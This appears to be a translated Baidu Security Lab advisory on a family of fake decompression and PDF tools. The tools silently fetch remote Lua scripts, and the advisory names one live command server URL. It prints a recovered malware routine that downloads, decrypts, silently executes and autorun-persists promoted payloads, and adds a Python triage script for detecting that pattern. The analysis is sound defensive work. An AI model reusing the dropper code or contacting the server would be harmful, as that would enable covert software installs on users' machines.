Baidu Security Lab recently found a number of widely used programs disguised as "decompression tools", "document readers" and similar utilities that in fact silently carry out remote code execution and traffic inflation for large profits. Technical analysis of this disguised software shows that all of it comes from the same company in Chongqing. The malware author evades detection by security software by registering multiple digital signatures, builds a variety of everyday utilities for Internet users on the same framework, and distributes them through a large number of downloaders and minimal "official websites". One of them, a decompression tool called "Geek Compression", has been downloaded as many as 3.08 million times from a single software-management platform.
When users install these programs, they silently fetch malicious modules and Lua scripts from remote servers and execute them. While running, the Lua scripts skip machines located in the five cities of Beijing, Shanghai, Guangzhou, Shenzhen and Zhuhai in order to avoid capture and analysis by mainstream security vendors. The Lua scripting engine exposes 121 API functions, including downloading and silently executing arbitrary programs, terminating processes, modifying arbitrary registry keys, installing APKs onto a connected mobile phone, changing the browser home page and local privilege escalation; the range of capabilities is alarming. Notably, the Lua scripts can be upgraded and updated at any time, so other malicious behaviour, such as privacy theft through this powerful backdoor, cannot be ruled out, which makes the security risk high.
After the software is installed and started, it calls the "youpdfupdate.exe" process in the installation directory with the parameter "youp"; that process obtains a dynamic link library from the network, saves it to the program's current path and names it update.yyp.
It then contacts "http://config.younoteba.top/src/youpdfu.html" to download and execute the Lua script. After decryption, the script performs a series of initialization steps, such as sending machine information to the author's server and setting its own process exit time, then downloads an XML configuration file and, according to the configuration obtained, carries out operations such as modifying the home page, filtering processes, and promoting and installing software. The InstallCpa function recovered from the script, shown below, implements the software promotion and installation step:
```lua
-- Recovered promotion-and-installation routine. v is one "cpa" entry from the
-- downloaded XML configuration; SenBizInfo beacons a status code to the
-- operator's server at each stage (code meanings inferred from the control flow).
function InstallCpa(v)
    SenBizInfo(v["id"],"cpa","5")
    -- Skip the install if the target is already present, unless the config
    -- says "nocheck"; IsSoftInstall checks name, process, icon and registry.
    if v['nocheck'] == "true" or api.IsSoftInstall(v["namecheck"],v["processcheck"],v["iconcheck"],v["regcheck"]) == false then
        local downrs = false
        local fileData = ""
        if v["packname"] == nil or v["packname"] == "" then
            v["packname"] = string.sub(os.tmpname(),1)
        end
        -- The payload is dropped into the temp directory
        local filepath = api.TempPath() .. v["packname"]
        if v["downtype"] == "1" then
            -- downtype 1: fetch into memory, optionally DES-decrypt, then write to disk
            for i=1,1,1 do
                fileData = api.HttpGet(v["url"])
                if fileData ~= nil then
                    if v["isencryptionpack"] == true then
                        local fileDataDecode = api.DesDecrypt(fileData,tSoftInfo["dkey"])
                        fileData = nil
                        fileData = fileDataDecode
                    end
                    local file = io.open(filepath,"wb")
                    if file ~= nil then
                        file:write(fileData)
                        file:close()
                        downrs = true
                    end
                    break
                end
            end
        else
            -- any other downtype: download straight to disk
            for i=1,1,1 do
                if api.DownFile(v["url"], filepath) ~= nil then
                    downrs = true
                    break
                end
            end
        end
        if downrs == true then
            SenBizInfo(v["id"],"cpa","6")
            if string.find(v["runtype"],"1") ~= nil then
                -- runtype 1: execute the dropped file; add Arg parameter if configured
                local cmd = "\"" .. filepath .. "\""
                if v['arg'] ~= nil and v['arg'] ~= "" then
                    cmd = cmd .. " " .. v['arg']
                end
                BzRunWritelog("cpa",v["id"])
                if bHadUAC and v['haduac'] == "1" then
                    -- the installer needs elevation: go through ShellExecute
                    api.ShellExec("open",filepath,v['arg'])
                    api.Delay(50*1000);
                else
                    -- otherwise run silently with a 3-minute timeout
                    api.Exec(cmd,3*60*1000)
                    api.Delay(50*1000);
                end
                if api.IsSoftInstall(v["namecheck"],v["processcheck"],v["iconcheck"],v["regcheck"]) then
                    SenBizInfo(v["id"],"cpa","0")
                else
                    SenBizInfo(v["id"],"cpa","4")
                end
            end
            if string.find(v["runtype"],"2") ~= nil then
                -- runtype 2: persist via a registry autorun entry
                -- (note: cmd is only assigned in the runtype-1 branch above)
                if api.SetAutoRun(v["regkey"],cmd) then
                    SenBizInfo(v["id"],"cpa","7")
                else
                    SenBizInfo(v["id"],"cpa","4")
                end
            end
        else
            SenBizInfo(v["id"],"cpa","2")
        end
    else
        SenBizInfo(v["id"],"cpa","1")
    end
end
```
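As an added example (not from the Baidu report or the malware itself), a small Python triage helper for captured Lua payloads of this kind: it inventories the api.* calls, the SenBizInfo beacon codes and embedded URLs, and flags the download-plus-silent-execution dropper pattern described above. The capability grouping in RISKY_API is this example's own assumption, and the SAMPLE fragment and its URL are constructed.

```python
import re
from collections import Counter

# Capability classes for the api.* functions seen in the recovered script.
# The grouping is this example's own triage assumption, not the malware's.
RISKY_API = {
    "HttpGet": "network download", "DownFile": "network download",
    "Exec": "silent execution", "ShellExec": "silent execution",
    "SetAutoRun": "persistence (registry autorun)",
    "DesDecrypt": "encrypted payload",
    "IsSoftInstall": "host reconnaissance",
}
API_CALL = re.compile(r"\bapi\.([A-Za-z_]\w*)\s*\(")
URL = re.compile(r"https?://[\w.\-]+(?:/[\w./\-]*)?", re.I)
# SenBizInfo(<id>, "<biz>", "<status>") beacons a stage code to the operator
BEACON = re.compile(r'SenBizInfo\([^,]+,\s*"(\w+)"\s*,\s*"(\d+)"\)')


def triage(lua_src: str) -> dict:
    """Inventory api.* calls, beacon codes and URLs in a captured Lua payload."""
    calls = Counter(API_CALL.findall(lua_src))
    capabilities = sorted({RISKY_API[c] for c in calls if c in RISKY_API})
    beacons = sorted({f"{biz}:{code}" for biz, code in BEACON.findall(lua_src)})
    # Download plus silent execution is the dropper pattern from the report
    dropper = {"network download", "silent execution"} <= set(capabilities)
    return {
        "api_calls": dict(calls),
        "capabilities": capabilities,
        "beacons": beacons,
        "urls": sorted(set(URL.findall(lua_src))),
        "suspicious": dropper,
    }


# Constructed sample modelled on the InstallCpa listing (the URL is a placeholder).
SAMPLE = r'''
function InstallCpa(v)
  SenBizInfo(v["id"],"cpa","5")
  local cfg = api.HttpGet("http://c2.example.invalid/config.xml")
  if api.IsSoftInstall(v["namecheck"],v["processcheck"],v["iconcheck"],v["regcheck"]) then return end
  local filepath = api.TempPath() .. v["packname"]
  local fileData = api.DesDecrypt(api.HttpGet(v["url"]), tSoftInfo["dkey"])
  local cmd = "\"" .. filepath .. "\""
  api.Exec(cmd, 3*60*1000)
  if api.SetAutoRun(v["regkey"], cmd) then SenBizInfo(v["id"],"cpa","7") end
end
'''

if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(f"{key}: {value}")
```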
In recent years, a number of tools and programs offered under the banner of "free" have turned Internet users' computers into money-making machines. Such software wins users' trust on the surface while its malicious behaviour is hard to detect. Baidu Security Lab suggests that users develop good habits online and use security software to run a scan promptly when they notice abnormal computer behaviour. Government and enterprise organizations should tighten control over software downloads and upgrades and strengthen their ability to analyse and perceive network communication behaviour. The lab also calls on software download sites and distribution channels to strengthen software auditing and standardize their services.